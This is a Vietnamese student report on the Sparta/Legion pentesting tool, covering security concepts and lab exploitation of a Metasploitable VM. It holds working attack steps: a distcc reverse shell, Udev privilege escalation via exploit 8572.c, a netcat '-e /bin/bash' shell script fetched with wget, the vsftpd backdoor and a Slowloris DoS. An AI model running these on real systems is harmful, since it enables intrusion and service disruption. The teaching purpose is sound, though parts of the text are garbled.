1. Trang chủ
  2. » Công Nghệ Thông Tin

Công cụ Sparta và Demo sử dụng

50 39 1

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 50
Dung lượng 4,38 MB

Nội dung

Mục tiêu của Pentest là giúp tổ chức phát hiện càng nhiều lỗ hổng càng tốt, từ đó khắc phục chúng để loại trừ khả năng bị tấn công trong tương lai. Người làm công việc kiểm tra xâm nhập được gọi là pentester Pentest có thể được thực hiện trên hệ thống máy tính, web app, mobile app, hạ tầng mạng, IoT, ứng dụng và hạ tầng cloud, phần mềm dịch vụ SaaS, API, source code, hoặc một đối tượng IT có kết nối với internet và có khả năng bị tấn công … nhưng phổ biến nhất là pentest web app và mobile app. Những thành phần trên được gọi là đối tượng kiểm thử (pentest target

Đề tài: Tìm hiểu cơng cụ Sparta MỤC LỤC LỜI MỞ ĐẦU CHƯƠNG 1: TỔNG QUAN Một số khái niệm liên quan đến an ninh mạng Một số khái niệm liên quan đến lỗ hổng bảo mật Phân loại lỗ hổng bảo mật Một số phương thức công mạng 4.1 Browser Attacks (Tấn cơng vào trình duyệt) 4.2 Malware Attacks (Tấn công mã độc) 4.3 DoS Attacks (Tấn công từ chối dịch vụ) 4.4 SQL Injection (Tấn công chèn mã SQL) 4.5 Kiểu công mạng khác CHƯƠNG 2: TỔNG QUAN VỀ THU THẬP THÔNG TIN VÀ LỖ HỔNG BẢO MẬT 10 Giới thiệu nhóm cơng cụ thu thập thông tin (Information Gathering) 10 Giới thiệu nhóm cơng cụ phân tích lỗ hổng (Vulnerability Analysis) 12 CHƯƠNG 3: GIỚI THIỆU CÔNG CỤ SPARTA 16 Cài đặt 17 Hướng dẫn sử dụng công cụ LEGION 18 CHƯƠNG 4: THỬ NGHIỆM CÔNG CỤ LEGION 25 Cơ sở lý thuyết 25 1.1Nikto 25 1.2 Hydra 27 1.3 Nmap 28 2.Thử nghiệm 30 2.1 Rà quét lỗ hổng Metasploitable công cụ LEGION 30 2.2 Leo thang đặc quyền cách khai thác lỗ hổng DistCC Udev (CVE-2004-2687 CVE-2009-1185) 37 2.3 Leo thang đặc quyền cách khai thác lỗ hổng VSFTPD (CVE2011-2523) 44 2.4 Thực công DOS cách khai thác lỗ hổng MSF: AUXILIARY/DOS/HTTP/SLOWLORIS 45 CHƯƠNG 5: SO SÁNH VÀ KẾT LUẬN 48 So sánh với công cụ SPARTA 48 Kết luận 49 CHƯƠNG 6: TÀI LIỆU THAM KHẢO 50 LỜI MỞ ĐẦU Với nhu cầu trao đổi thông tin ngày nay, bắt buộc quan, tổ chức phải hoà vào mạng toàn cầu Internet An tồn bảo mật thơng tin vấn đề quan trọng hàng đầu việc kết nối mạng nội quan, doanh nghiệp, tổ chức với Internet hay chí nhân với Ngày nay, biện pháp an tồn thơng tin cho máy tính cá nhân mạng nội nghiên cứu triển khai Tuy nhiên, thường xuyên xảy tình trạng như: hệ thống mạng bị cơng, tổ chức bị đánh cắp thông tin gây nên hậu vô nghiêm trọng Những vụ công nhằm vào hệ thống thuộc công ty lớn AT&T, IBM, trường đại học, quan nhà nước, tổ chức quân sự, ngân hàng, … xảy thường xuyên, đôi lúc xảy số vụ công với quy mơ khổng lồ (có tới 100.000 máy tính bị công) Hơn số phần tảng băng trôi Một phần lớn vụ cơng khơng thơng báo nhiều lý do, số kể lo uy tín đơn giản người quản trị dự án không hay biết vụ công nhằm vào hệ thống họ Kiểm thử xâm nhập hay Pentest, viết tắt “Penetration Testing” hình thức đánh giá mức độ an toàn hệ thống IT công mô thực tế Hiểu đơn giản, Pentest cố gắng xâm nhập vào hệ thống để phát điểm yếu tiềm tàng hệ thống mà tin tặc khai thác gây thiệt hại Mục tiêu Pentest giúp tổ chức phát nhiều lỗ hổng tốt, từ khắc phục chúng để loại trừ khả bị công tương lai Người làm công việc kiểm tra xâm nhập gọi pentester Pentest thực hệ thống máy tính, web app, mobile app, hạ tầng mạng, IoT, ứng dụng hạ tầng cloud, phần mềm dịch vụ SaaS, API, source code, đối tượng IT có kết nối với internet có khả bị công … phổ biến pentest web app mobile app Những thành phần gọi đối tượng kiểm thử (pentest target) Ngày nay, phát triển công nghệ, kiểm tra thâm nhập trở thành mô-đun thiếu hệ thống an tồn thơng tin nhiều doanh nghiệp Bài báo cáo chúng em xin phép trình bày thơng tin mà chúng em thu thập công cụ Sparta Kali Linux CHƯƠNG 1: TỔNG QUAN Một số khái niệm liên quan đến an ninh mạng An ninh mạng bảo đảm hoạt động không gian mạng không gây hại đến an ninh quốc gia, trật tự, an toàn xã hội, quyền lợi ích hợp pháp quan, tổ chức, cá nhân Bảo vệ an ninh mạng phòng ngừa, phát hiện, ngăn chặn xử lý hành vi xâm phạm an ninh mạng Không gian mạng mạng lưới kết nối sở hạ tầng công nghệ thông tin, bao gồm mạng viễn thông, mạng Internet, mạng máy tính, hệ thống thơng tin, hệ thống xử lý điều khiển thông tin, sở liệu: nơi người thực hành vi xã hội không bị giới hạn không gian thời gian Tội phạm mạng hành vi sử dụng không gian mạng, công nghệ thông tin phương tiện điện tử để thực tội phạm quy định Bộ luật Hình Tấn cơng mạng hành vi sử dụng không gian mạng, công nghệ thông tin phương tiện điện tử để phá hoại, gây gián đoạn hoạt động mạng viễn thông, mạng Internet, mạng máy tính, hệ thống thơng tin, hệ thống xử lý điều khiển thông tin, sở liệu, phương tiện điện tử Một số khái niệm liên quan đến lỗ hổng bảo mật Trong an ninh mạng, lổ hổng bảo mật điểm yếu bị tội phạm mạng lợi dụng để truy cập trái phép vào hệ thống máy tính Theo định nghĩa Tổ chức Tiêu chuẩn hóa Quốc tế Ủy ban Kỹ thuật Điện Quốc Tế (ISO/IEC) cơng bố ISO 27005 lỗ hổng bảo mật “Điểm yếu tài sản nhóm tài sản bị khai thác nhiều đe dọa, tài sản thứ có giá trị tổ chức, hoạt động kinh doanh tính liên tục chúng, bao gồm nguồn thông tin hỗ trợ sứ mệnh tổ chức” Lực lượng chuyên trách kỹ thuật Internet (IETF) cũngđã đưa định nghĩa lỗ hổng bảo mật RFC 4949 sau: “Một lỗ hổng điểm yếu thiết kế, triển khai vận hành quản lý hệ thống bị lợi dụng để vi phạm sách bảo mật hệ thống” [3] Nhìn chung, định nghĩa vềlỗ hổng bảo mật tổ chức đưa xoay quanh việc khiếm khuyết hệthống bao gồm phần cứng phần mềm tồn bị kẻ xấu lợi dụng để khaithác gây tổn hại cho tổ chức, cá nhân sở hữu Có nhiều nguyên nhân gây lỗ hổng bảo mật: lỗi thân hệ thống, người quản trị hệ thống không hiểu sâu sắc dịch vụ cung cấp người sử dụng có ý thức bảo mật click vào đường link lạ tải ứng dụng độc hại Lỗ hổng bảo mật có mức độ ảnh hưởng khác Có lỗ hổng ảnh hưởng đến chất lượng dịch vụ cung cấp có lổ hổng ảnh hưởng tới hệ thống làm ngưng trệ dịch vụ Phân loại lỗ hổng bảo mật Có nhiều tổ chức khác phân loại lỗ hổng đặc biệt Theo Bộ Quốc phòng Mĩ, loại lỗ hổng bảo mật hệ thống gồm: Các lỗ hổng loại A: - Rất nguy hiểm - Đe dọa tính tồn vẹn bảo mật hệ thống - Cho phép người sử dụng bên truy cập bất hợp pháp vào hệ thống - Gây việc phá hỏng toàn hệ thống - Xuất hệ thống quản trị yếu khơng kiểm sốt cấu hình mạng Các lỗ hổng loại B: - Có mức độ nguy hiểm trung bình - Cho phép người sử dụng có thêm tác quyền hệ thống mà khơng cần thực bước kiểm tra tính hợp lệ - Thường có ứng dụng, dịch vụ hệ thống - Có thể dẫn đến việc hay rị rỉ thơng tin u cầu bảo mật Các lỗ hổng loại C: - Có mức độ nguy hiểm thấp, ảnh hưởng đến chất lượng dịch vụ làm gián đoạn hệ thống - Cho phép thực phương thức công từ chối dịch vụ (Dinal of Services) gọi tắt DoS - Ít phá hỏng liệu hay cho phép quyền truy cập bất hợp pháp vào máy tính - DoS hình thức công sử dụng giao thức tầng Internet giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng hệ thống từ chối người sử dụng truy cập vào hệ thống cách hợp pháp Một số phương thức công mạng Tấn cơng mạng hay cịn gọi chiến tranh khơng gian mạng (Cyber-war) Có thể hiểu cơng mạng hình thức cơng xâm nhập vào hệ thống mạng máy tính, sở liệu, hạ tầng mạng, website, thiết bị cá nhân tổ chức Cụm từ “tấn cơng mạng” có nghĩa hiểu: - Hiểu theo cách tích cực: Tấn công mạng (Penetration Testing) phương pháp Hacker mũ trắng xâm nhập vào hệ thống mạng, thiết bị, website để tìm lỗ hổng, nguy công nhằm bảo vệ cá nhân tổchức - Hiểu theo cách tiêu cực: Tấn công mạng (Network Attacks) hình thức, kỹ thuật hacker mũ đen cơng vào hệ thống để thay đổi đối tượng tống tiền Đối tượng bị cơng cá nhân, doanh nghiệp, tổ chức nhà nước Hacker tiếp cận thơng qua mạng nội gồm máy tính, thiết bị, người Trong yếu tố người, hacker tiếp cận thơng qua thiết bị mobile, mạng xã hội, ứng dụng phần mềm Tóm lại, cơng khơng gian mạng nhằm vào cá nhân, doanh nghiệp, quốc gia, xâm nhập vào hệ thống, sở hạ tầng mạng, thiết bị, người nhiều cách khách mục tiêu khác 4.1 Browser Attacks (Tấn cơng vào trình duyệt) Một kiểu cơng mạng điển hình năm 2017 phải kể đến cơng vào trình duyệt Các cơng vào trình duyệt thường bắt đầu trang web hợp pháp dễ bị tổn thương Kẻ cơng xâm nhập vào website gây hại cho đối tượng phần mềm độc hại Cụ thể, có khách truy cập thơng qua trình duyệt web, trang web bị nhiễm mã độc Từ đó, mã độc xâm nhập vào hệ thống nạn nhân thông qua lỗ hổng trình duyệt Các trình duyệt web bị tin tặc công chủ yếu năm 2017 Microsoft Internet Explorer, Google Chrome, Mozilla Firefox, Apple Safari, Opera 4.2 Malware Attacks (Tấn công mã độc) Tấn công malware hình thức phổ biến Malware bao gồm spyware (phần mềm gián điệp), ransomware (mã độc tống tiền), virus worm (phần mềm độc hại có khả lây lan nhanh) Thông thường, tin tặc công người dùng thơng qua lỗ hổng bảo mật, dụ dỗ người dùng click vào đường link email để phần mềm độc hại tự động cài đặt vào máy tính Một cài đặt thành cơng, malware gây ra:  Mã hóa tồn liệu người dùng yêu cầu tiền chuộc để giải mã file (Ransomware)  Cài đặt thêm phần mềm độc hại khác  Lén lút theo dõi người dùng đánh cắp liệu (Spyware)  Làm hư hại phần mềm, phần cứng, làm gián đoạn hệ thống 4.3 DoS Attacks (Tấn công từ chối dịch vụ) DoS (Denial of Service) hình thức tán cơng mà tin tặc “đánh sập tạm thời” hệ thống, máy chủ, mạng nội Để thực điều này, chúng thường tạo lượng traffic/request khổng lồ thời điểm, khiến cho hệ thống bị tải, từ người dùng khơng thể truy cập vào dịch vụ khoảng thời gian mà công DoS diễn Một hình thức biến thể DoS DDoS (Distributed Denial of Service): tin tặc sử dụng mạng lưới máy tính ma (botnet) để cơng nạn nhân Điều nguy hiểm máy tính thuộc mạng lưới botnet khơng biết thân bị lợi dụng để làm công cụ công 4.4 SQL Injection (Tấn công chèn mã SQL) Các công SQLi thực cách gửi lệnh SQL độc hại đến máy chủ sở liệu thông qua yêu cầu người dùng mà website cho phép Bất kì kênh input sử dụng đẻ gửi lệnh độc hại … Với SQLi, hacker truy cập phần tồn liệu hệ thống, gây thiệt hại khổng lồ Với việc SQLi dễ công, phổ biến, gây hậu nghiêm trọng Đó lý mà SQLi đứng đầu 10 lỗ hổng bảo mật OWASP Tấn công chèn mã SQL 4.5 Kiểu công mạng khác Ngồi kiểu cơng nêu trên, Hacker cịn xâm nhập vào hệ thống cách - Tấn công vật lý (Physical Attacks): Tin tặc cố gắng phá hủy, ăn cắp liệu kiến trúc hệ thống mạng - Tấn công nội bội (Insider Attacks): Các công nội thường liên quan tới người Chẳng hạn tỏng công ty, nhân viên “căm ghét” người khác, … Các cơng hệ thống mạng nội bộcó thể gây hại vơ hại Khi có cơng mạng nội xảy ra, thong tin liệu cơng ty bị truy cập trái phép, thay đổi rao bán CHƯƠNG 2: TỔNG QUAN VỀ THU THẬP THÔNG TIN VÀ LỖ HỔNG BẢO MẬT Giới thiệu nhóm cơng cụ thu thập thơng tin (Information Gathering) Nếu ví cơng việc Pentesting chiến, Information Gathering có lẽ coi q trình trinh sát Nó đại diện cho triết lý vô quan trọng "Biết địch biết ta, trăm trận trăm thắng" Thành công đây, thất bại Càng nắm vững thông tin mục tiêu, bạn tăng hội chiếm quyền điều khiển mục tiêu Information gathering hành động thu thập thu thập loại thông tin khác nạn nhân mục tiêu hệ thống mục tiêu Đây bước hay gọi giai đoạn đầu trình Penetration Testing Penetration Testing trình xâm nhập hệ thống mạng để đánh giá tính bảo mật tổ chức cách khai thác lỗ hổng theo cách mà kẻ cơng khai thác chúng Đây nơi mà penetration tester hacker thực giai đoạn Đây bước cần thiết quan trọng cần phải thực Càng thu thập nhiều thông tin mục tiêu, có nhiều xác suất để thu kết phù hợp Information Gathering không giai đoạn kiểm tra việc bảo mật, cịn trình mà penetration tester hacker nên nắm vững để có kinh nghiệm tốt q trình kiểm thử xâm nhập Information gathering có nhiều công cụ khác Bước quan trọng bạn cần thơng tin ví dụ tên tuổi, ngày tháng năm sinh, số điện thoại, email để thực việc cơng đốn mật loại hình công khác Hầu Pen Tester bắt đầu công việc họ cách thu thập thông tin điều đòi hỏi nhiều nỗ lực kiên nhẫn Information gathering phân thành ba loại chính: Footprinting, Scanning, Enumeration:  Footprinting: q trình thu thập thơng tin mục tiêu từ liệu mà đối tượng hay tổ chức công khai internet Mục tiêu phần footprinting thu thập nhiều thông tin đối tượng tốt, mục đích Footprinting cần phải thu thập thông tin như: Domain Name, IP Address, Email Address, Google Hack từ nguồn thông tin khác Tab mysql-default (3306/TCP) nơi mà công cụ Hydra thực việc bruteforce trả kết Các tab sau tương tự kết mà công cụ Hydra brute-force trả cho người dùng Ở phần sâu vào việc phân tích khai thác cách lỗ hổng mà quét với hỗ trợ Metasploit Framework 2.2 Leo thang đặc quyền cách khai thác lỗ hổng DistCC Udev (CVE2004-2687 CVE-2009-1185) DistCC công cụ tăng tốc độ biên dịch mã nguồn cách sử dụng lực tính tốn phân tán (Distributed Computing) thơng qua mạng máy tính Nếu config xác, DistCC giảm thiểu thời gian biên dịch mã nguồn cách đáng kể Thế config sai sót bị khai thác, cụ thể CVE-2004-2687, DistCC phiên 2.x không config để chặn truy cập bên ngồi tới server bị kẻ cơng khai thác để thực thi lệnh server mà khơng cần phải qua q trình kiểm tra phân quyền Trước thực leo thang đặc quyền, khai thác lỗ hổng để tạo reverse shell từ máy nạn nhân máy cơng Bước 1: Kiểm tra máy nạn nhân có chạy DistCC khơng Kiểm tra xem kết có service “distccd” chạy khơng, có tức máy nạn nhân bị khai thác lỗ hổng DistCC Bước 2: Khai thác lỗ hổng DistCC để tạo reverse shell với quyền thấp (Low –Privileges) (CVE-2004-2687) Nhập msfconsole vào terminal để mở Metasploit Framework, sau nhập search distcc để tìm kiếm module khai thác lỗ hổng DistCC Nhập use exploit/unix/misc/distcc_exec để sử dụng module này, sau xác định giá trị RHOST, LHOST PAYLOAD địa máy nạn nhân, địa máy công cmd/unix/reverse để tạo reverse shell từ máy nạn nhân máy cơng Sau nhập exploit để tiến hành công, công thành công ta tạo reverse shell máy công, ta nhập whoami kết trả “daemon”, “daemon” process ta chưa có quyền “root” Hình 20 Kiểm tra quyền Bước 3: Khai thác lỗ hổng Udev để leo thang đặc quyền (CVE-2009-1185) Udev phiên 1.4.1 trở xuống không kiểm tra nguồn gốc thơng điệp NETLINK có phải đến từ kernel space hay khơng, nên người dùng cục khai thác để leo thang đặc quyền cách gửi thông điệp NETLINK từ user space Udev 1.4.1 thường xuất Ubuntu 8.10 sử dụng Linux kernel 2.6 trở xuống, cần xác định phiên Linux kernel mà hệ thống nạn nhân sử dụng Tiếp tục nhập uname -a lsb_release -a vào reverse shell từ máy nạn nhân Kết trả máy nạn nhân sử dụng kernel 2.6.24 phiên Ubuntu 8.04 Mở terminal Kali dùng searchsploit để tìm payload leo thang đặc quyền lợi dụng lỗ hổng kernel phiên lệnh searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6 Ở sử dụng file “linux/local/8572.c” Nhậpless/usr/share/exploitdb/exploits/linux/local/8572.c để xem mã nguồn Mục tiêu ta upload file “8572.c” file script “run” có chứa netcat reverse shell lên thư mục /tmp máy nạn nhân Để làm điều cần phải tạo file script “run” lệnh nano /var/www/html/run Nhập vào nội dung #!/bin/bash nc 192.168.231.128 12345 -e /bin/bash với “192.168.231.128” địa máy công “12345” cổng mà lắng nghe máy công Sau tiến hành restart apache2, tạo symbolic link tới file “8572.c” lệnh service apache2 restart ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html Lúc thư mục /var/www/html có file “run” thư mục “local”, máy mạng LAN truy cập file folder thông qua địa http://192.168.231.128/local http://192.168.231.128/run Chuyển sang Low – Privileges Shell, nhập lệnh cd /tmp wget http://192.168.80.133/run wgethttp://192.168.80.133/local/8572.c để tải file “run” “8572.c” từ máy công Nhập gcc -o exploit 8572.c để compile file “8572.c” Khi chạy file “exploit” script “run” thực thi tạo reverse shell với quyền root máy cơng có địa IP, PORT mà xác định trước file “run” Để chạy file “exploit” phải truyền vào Process ID (PID) udevd netlink socket Chúng ta lấy PID cách chạy lệnh cat/proc/net/netlink PID có giá trị khác PID mà cần tìm kiếm Có thể xác nhận lại lệnh ps aux | grep udev PID kết trảvề lệnh lớn đơn vị so với kết lệnh Trong trường hợp PID cần tìm 2743 Trước khai thác lỗ hổng lệnh /exploit 2743 cần phải khởi tạo listener máy công netcat: nc -lvp 12345 Kiểm tra đặc quyền cách nhập whoami, kết trả “root” leo thang đặcquyền thành công 2.3 Leo thang đặc quyền cách khai thác lỗ hổng VSFTPD (CVE-20112523) VSFTPD viết tắt “Very Secure FTP Deamon”, FTP Server cho hệ thống Unix-like bao gồm Linux Vào tháng năm 2011, người ẩn danh upload phiên VSFTPD chứa backdoor lên server Vì mà vsftpd 2.3.4 tải khoảng 30/06/2011 – 03/07/2011 chứa backdoor cho phép mở shell cổng 6200/tcp Bước 1: Khởi động Metasploit Framework lệnh msfconsole Bước 2: Lựa chọn module vsftpd_234_backdoor lệnh use exploit/unix/ftp/vsftpd_234_backdoor Sau tiến hành xác định RHOST địa máy nạn nhân lệnh set RHOST 129.168.231.132 Hình 32 Set giá trị Bước 3: Nhập exploit để tiến hành công 4 Bước 4: Kiểm tra đặc quyền lệnh whoami, kết trả “root” tức khai thác thành công Vậy leo thang đặc quyền thành công 2.4 Thực công DOS cách khai thác lỗ hổng MSF: AUXILIARY/DOS/HTTP/SLOWLORIS DOS tên đầy đủ tiếng Anh Denial of Service, dịch tiếng Việt từ chối dịch vụ Tấn công từ chối dịch vụ DoS công nhằm làm sập máy chủ mạng, khiến người dùng khác truy cập vào máy chủ/mạng Kẻ cơng thực điều cách "tuồn" ạt traffic gửi thơng tin kích hoạt cố đến máy chủ, hệ thống mạng mục tiêu, từ khiến người dùng hợp pháp (nhânviên, thành viên, chủ tài khoản) truy cập dịch vụ, tài nguyên họ mong đợi Nạn nhân công DoS thường máy chủ web tổ chức cao cấp ngân hàng, doanh nghiệp thương mại, công ty truyền thơng, trang báo, mạng xã hội… Ví dụ bạn nhập vào URL website vào trình duyệt, lúc bạn gửi yêu cầu đến máy chủ trang để xem Máy chủ xử lý số yêu cầu định khoảng thời gian, kẻ cơng gửi ạt nhiều yêu cầu đến máy chủ làm bị tải yêu cầu bạn không xử lý Đây kiểu “từ chối dịch vụ” làm cho bạn khơng thể truy cập đến trang Kẻ cơng sử dụng thư rác để thực công tương tự tài khoản email bạn Dù bạn có tài khoản email công ty hay dùng dịch vụ miễn phí Gmail bị giới hạn số lượng liệu tài khoản Bằng cách gửi nhiều email đến tài khoản bạn, kẻ cơng làm đầy hòm thư đến ngăn chặn bạn nhận mail khác Bước 1: Khởi động Metasploit framework lệnh msfconsole Bước 2: Nhập use khai thác lỗ hổng auxiliary/dos/http/slowloris để sử dụng module Bước 3: Xác định giá trị RHOST địa máy nạn nhân Bước 4: Nhập exploit để tiến hành công Bước 5: Mở metasploitable2 lên nhập lệnh top để xem tài nguyên máy nạn nhân Do công slowloris nên sau lúc, tiến trình Apache chiếm tồn tài nguyên máy Chứng to thực thành công việc công DOS vào máy nạn nhân CHƯƠNG 5: SO SÁNH VÀ KẾT LUẬN So sánh với công cụ SPARTA Hiện bạn sử dụng phiên Kali Linux từ 2020.1 trở lên, Kali Linux khơng hỗ trợ cơng cụ Sparta nữa, mà thay vào dùng cơng cụ Legion Hình Cơng cụ SPARTA Nếu bạn cảm thấy giao diện LEGION quen thuộc LEGION fork từ SPARTA LEGION xây dựng dựa tiện ích SPARTA với mã sở tái cấu trúc lại hoàn toàn cho phép tăng hiệu suất, cải thiện độ tin cậy nội suy tốt so với cơng cụ khác vài tính Những thay đổi đáng ý công cụ LEGION so với công cụ SPARTA:  Đã cập nhật lên PyQT5, tăng khả phản hồi, GUI lỗi hơn, trực quan với tính vượt trội  Ước tính thời gian hồn thành nhiệm vụ  Quét toàn danh sách IP, hostname mạng CIDR cú click  Có khả xóa kết quả, thực lại việc quét host xóa host  Tùy chọn quét Nmap chi tiết  Sửa đổi trình hàng đợi, thực thi quy trình để tăng hiệu suất độ tin cậy ứng dụng  Đơn giản hóa q trình cài đặt công cụ với độ phân giải phù hợp  Tự động lưu dự án thời gian thực để tránh trường hợp xảy cố, bạn khơng bị q trình  Tùy chọn triển khai vùng chứa Docker  Việc loại bỏ thư viện cũ không dùng thực cơng cụ Legion tái cấu trúc từ phiên Python 2.7 thành phiên Python 3.6  Hỗ trợ độ phân giải tên máy chủ  Quét vhosts/sni hosts  Công cụ LEGION hỗ trợ đội ngũ phát triển lớn Kết luận Trong báo cáo trên, em giới thiệu nhóm cơng cụ liên quan đến cơng cụ Sparta với bước cài đặt, hướng dẫn sử dụng cơng cụ Do Sparta khơng cịn hỗ trợ nên em làm công cụ tương tự Legion Legion cơng cụ vơ hữu ích pentest, hỗtrợ họ việc khám phá, trinh sát khai thác hệ thống thông tin Trong phần thử nghiệm, em sử dụng công cụ Legion để rà quét lỗ hổng Metasploitable Và em kết hợp với cơng cụ Metasploit Framework để phân tích lỗ hổng quét từ trình Trong thời gian tới, em tiếp tục nghiêm cứu thêm cơng cụ Legion để sử dụng công cụ việc kiểm thử hệ thống hiệu Em xin chân thành cảm ơn! CHƯƠNG 6: TÀI LIỆU THAM KHẢO 1.Quốc Hội, Luật An Ninh Mạng, 2018 2.ISO/IEC, "ISO/IEC 27005:2018 - Information technology — Security techniques — Information security risk management," 2018 3.The IETF Trust, "RFC 4949 - Internet Security Glossary, Version2," 2007 4.LIFARS, "Missing SPARTA in latest Kali Linux 2020.1? Try LEGION!,"2020.[Online].Available: https://www.howkteam.vn/course/41-dieutra cac-khai-niem ky-thuatdieu-tra/51-phan-tich-lo-hong-bao-matvulnerability-analysis-2799 5.GeeksforGeek, "Legion Tool in Kali Linux," 2020 [Online] Available: https://www.geeksforgeeks.org/legion-tool-in-kali-linux/ 6.Gokulakrishna, "An Overview Of Network Penetration TestingUsing Legion Framework," 2020 [Online] Available: https://www.csharpcorner.com/article/an-overview-of-network-penetration-testingusinglegion-framework/ 7.GoVanguard, "Getting Started with Using Legion," [Online].Available: https://govanguard.com/legion/#getting-started 8.K Linux, "Legion -Test Web Application Vulnerability Automatically,"2020.[Online].Available:https://www.kalilinux.in/2020/09/legion -kali-linux.html ... em giới thiệu nhóm công cụ liên quan đến công cụ Sparta với bước cài đặt, hướng dẫn sử dụng công cụ Do Sparta khơng cịn hỗ trợ nên em làm công cụ tương tự Legion Legion cơng cụ vơ hữu ích pentest,... thành công việc công DOS vào máy nạn nhân CHƯƠNG 5: SO SÁNH VÀ KẾT LUẬN So sánh với công cụ SPARTA Hiện bạn sử dụng phiên Kali Linux từ 2020.1 trở lên, Kali Linux không hỗ trợ công cụ Sparta. .. áp dụng bước sau:  Trước sử dụng công cụ để đánh giá lỗ hổng bảo mật, kiểm nghiệm viên phải hiểu rõ chức công cụ, từ tìm cơng cụ phù hợp để thu thập thông tin cần thiết  Đảm bảo công cụ sử dụng

Ngày đăng: 07/01/2022, 15:21

HÌNH ẢNH LIÊN QUAN

Hình 2.3. Vulnerability Analysis - Công cụ Sparta và Demo sử dụng
Hình 2.3. Vulnerability Analysis (Trang 12)
Khi đã hoàn tất việc chỉnh sửa cấu hình thì ta sẽ click nút Submit để công cụ Legion bắt đầu việc quét - Công cụ Sparta và Demo sử dụng
hi đã hoàn tất việc chỉnh sửa cấu hình thì ta sẽ click nút Submit để công cụ Legion bắt đầu việc quét (Trang 23)
- Quét các vấn đề liên quan đến cấu hình, chẳng hạn như thư mục tĩnh cóthể truy nhập trực tiếp  - Công cụ Sparta và Demo sử dụng
u ét các vấn đề liên quan đến cấu hình, chẳng hạn như thư mục tĩnh cóthể truy nhập trực tiếp (Trang 26)
Tab Screenshot(80/TCP) là hình ảnh màn hình được chụp từ máy nạn nhân, - Công cụ Sparta và Demo sử dụng
ab Screenshot(80/TCP) là hình ảnh màn hình được chụp từ máy nạn nhân, (Trang 35)
Hình 3. 20. Kiểm tra quyền - Công cụ Sparta và Demo sử dụng
Hình 3. 20. Kiểm tra quyền (Trang 39)
Hình 3. 32. Set các giá trị - Công cụ Sparta và Demo sử dụng
Hình 3. 32. Set các giá trị (Trang 44)
2.3 Leo thang đặcquyền bằng cách khaithác lỗ hổng VSFTPD (CVE-2011- (CVE-2011-2523)  - Công cụ Sparta và Demo sử dụng
2.3 Leo thang đặcquyền bằng cách khaithác lỗ hổng VSFTPD (CVE-2011- (CVE-2011-2523) (Trang 44)
Hình 2.6. Công cụ SPARTA - Công cụ Sparta và Demo sử dụng
Hình 2.6. Công cụ SPARTA (Trang 48)

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w